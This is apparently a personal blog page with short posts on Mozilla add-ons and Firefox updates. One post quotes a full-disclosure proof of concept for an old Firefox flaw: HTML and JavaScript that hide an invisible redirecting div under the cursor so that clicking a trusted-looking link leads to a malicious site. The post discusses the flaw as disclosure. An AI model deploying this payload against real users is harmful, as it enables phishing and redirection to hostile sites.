Xanda's Blog !~!

Introducing MyEja – Bahasa Malaysia dictionary for spell-checking in Firefox and Thunderbird

Mar
04

After 3-4 hours struggling to make it public so here we go.. MyEja, the Bahasa Malaysia dictionary for spell-checking in Firefox and Thunderbird

The open-source Firefox Add-on MyEja for spell-checking supports Firefox and Thunderbird platform-independently. It is based on the OpenOffice Extension “Kamus Bahasa Malaysia (Malay Dictionary)”. The contents of the dictionaries are untouched and is in original state in the initial release of MyEja . The latest versions of Firefox and Thunderbird are also supported. MyEja was founded by me and it is the second initiative project from Mozilla Malaysia Community.

Looking forward for the approval from Mozilla Add-on Team.. The add-on is accessible at https://addons.mozilla.org/en-US/firefox/addon/myeja/

DontPhishMe v0.3.2 released

Aug
24

Mozilla just approved the sandbox version of DontPhishMe and now it is public 🙂 Get the latest version of DontPhishMe (v0.3.2) and feel free to comment and report bug

Phishing or Clickjacking?

Feb
26

I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.

Here is one thing that made me smile:

Mozilla firefox 3.6 unpatched phishing vulnerability

From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300

…Unpatched bug since Mozilla firefox 3.0…

Mozilla “INsecurity team” remember, security through obscurity just
DOESN’T WORK…
Locking down bugzilla advisories even the 2 years old ones is
unnecessary and lame.

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://Maliciouswebsite’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://trustedwebsite”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://trusted
website</font></a><br>

</div>
</body>
</html>

For example:

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.wikipedia.org’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://www.google.com”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-
size:32px”>http://www.google.com</font></a><br>

</div>
</body>
</html>

Source:www exploit-db com

Phishing huh? To me its clickjacking 🙂

Source: http://seclists.org/fulldisclosure/2010/Feb/434

P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to 😉

Please Upgrade to Firefox 3.0.15 or 3.5.4

Oct
28

Have you update your Firefox? Kindly tell me if you haven’t 😉

Naahh.. Just kidding.. Updates are available now.. Patch.. Patch.. and Patch.. Before its too late

Read more here:

[credit: IMG source]